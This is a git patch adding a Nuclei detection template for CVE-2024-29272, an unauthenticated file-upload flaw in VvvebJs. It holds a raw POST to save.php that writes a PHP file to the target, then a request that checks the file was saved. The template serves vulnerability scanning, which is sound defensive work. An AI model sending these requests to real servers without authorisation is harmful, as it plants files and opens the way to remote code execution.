From 77afa690c21d8345bf4d2cc437af0d55e2e46418 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Mon, 26 Aug 2024 13:21:03 +0300 Subject: [PATCH] CVE-2024-29272 --- http/cves/2024/CVE-2024-29272.yaml | 60 ++++++++++++++++++++++++++++++ 1 file changed, 60 insertions(+) create mode 100644 http/cves/2024/CVE-2024-29272.yaml diff --git a/http/cves/2024/CVE-2024-29272.yaml b/http/cves/2024/CVE-2024-29272.yaml new file mode 100644 index 0000000000..e7fbbfe1cf --- /dev/null +++ b/http/cves/2024/CVE-2024-29272.yaml @@ -0,0 +1,60 @@ +id: CVE-2024-29272 + +info: + name: VvvebJs < 1.7.5 - Arbitrary File Upload + author: s4e-io + severity: medium + description: | + Arbitrary File Upload vulnerability in VvvebJs before version 1.7.5, allows unauthenticated remote attackers to execute arbitrary code and obtain sensitive information via the sanitizeFileName parameter in save.php. + reference: + - https://github.com/awjkjflkwlekfdjs/CVE-2024-29272/ + - https://github.com/givanz/VvvebJs/issues/343 + - https://nvd.nist.gov/vuln/detail/CVE-2024-29272 + - https://vuldb.com/?id.257680 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2024-29272 + cwe-id: CWE-434 + epss-score: 0.00043 + epss-percentile: 0.09538 + cpe: cpe:2.3:a:vvvebjs:vvvebjs:1.7.4:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: vvvebjs + product: vvvebjs + fofq-query: icon_hash="524332373" + tags: cve,cve2024,file-upload + +variables: + num: "{{rand_int(1000, 9999)}}" + +http: + - raw: + - | + POST /save.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + file=demo/landing/index.php&html={{md5(num)}} + + matchers: + - type: dsl + dsl: + - 'contains(body,"File saved")' + - 'status_code == 200' + condition: and + internal: true + + - raw: + - | + GET /demo/landing/index.php HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body,"{{md5(num)}}")' + - 'status_code == 200' + condition: and